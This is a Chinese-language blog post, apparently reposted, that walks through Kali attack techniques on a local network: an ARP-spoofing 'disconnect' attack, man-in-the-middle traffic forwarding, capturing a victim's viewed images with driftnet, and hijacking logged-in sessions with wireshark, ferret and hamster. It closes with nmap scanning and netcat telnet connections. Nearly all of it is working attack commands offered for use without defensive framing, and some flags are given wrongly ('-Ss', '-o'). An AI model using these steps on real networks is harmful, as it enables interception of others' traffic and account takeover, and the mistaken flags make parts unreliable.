您的位置:首页 > 其它

Kali渗透基础

2016-11-14 18:41 183 查看
######局域网断网攻击

fping -asg 192.168.1.0/24  ##扫描0网段所有能ping通的ip

nmap  -Ss  192.168.1.141 ##扫描141主机打开的端口

arp攻击

arpspoof -i 自己的网卡 -t  目标IP  目标网关

例如:arpspoof  -i   eth0   -t  192.168.1.100
192.168.1.1

######局域网arp欺骗

目标的IP流量经过我的网卡,从网关出去

首先,进行IP流量转发

echo 1 >/proc/sys/net/ipv4/ip_forward (echo写命令,是不会有回显的)

再进行arpspoof命令

arpspoof  -i   eth0   -t  192.168.1.100 192.168.1.1

此时目标的流量将会经过我的网卡,就成为了arp欺骗

driftnet ##获取本机网卡的图片

因为目标的流量此时经过我的网卡,所以我获取本机网卡图片=获得目标所浏览图片

#######会话劫持——登陆别人登录过的网站

所用软件:

wireshark ##抓包

ferret ##重新生成抓包后的文件

hamster ##重放流量

首先对目标进行arp欺骗,然后用wireshark进行抓包

当目标登陆了某些网站时,wireshark上会显示很多DNS的信息

此时停止抓包,将文件保存为pcap格式,关闭wireshark,

进入保存文件的目录,使用ferret   -r   文件名  命令,生成一个.txt的文件,此时执行hamster命令,会生成一些信息(127.0.0.1:1234)

意思是把代理改为127.0.0.1的1234端口

然后在浏览器输入127.0.0.1:1234即可看到一个ip,点击后进入,有很多地址,在其中找到我们需要的即可

第二种方法:

不用欺骗了

ferret -i eth0

另开一个标签

hamster

改代理端口,同上

Nmap基础学习

nmap 192.168.1.102     扫描此ip地址开放的所有端口

也支持多个ip同时扫描

nmap 192.168.1.102 192.168.8.223

或在同一个子网下:nmap 192.168.1.102,24,171 同时扫描3个ip地址

也可以将需要扫描的ip地址存在一个文件里,通过nmap -iL filename 扫描文件里所有的ip

随机扫描:nmap -iR 3     随机扫描3个ip(我也没搞清楚是什么里的3个)

排除某些ip扫描:如:nmap  10.73.26.0/24 --exclude 10.73.26.183-190 (扫描所有ip除了183到190)

                                        nmap 10.73.26.0/24 --excludefile file.txt  (扫描所有ip除了file.txt里的ip)

扫描开放网络端口:

                                        nmap -o 识别远程操作系统

                                                   -sC 运行默认的脚本扫描

                                                    -A 10.73.31.64

                                                   

可以在扫描出端口后,若有23端口telnet开放,可以使用netcat进行远程连接:

命令:nc ipaddress 23
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  Kali 渗透 arp 局域网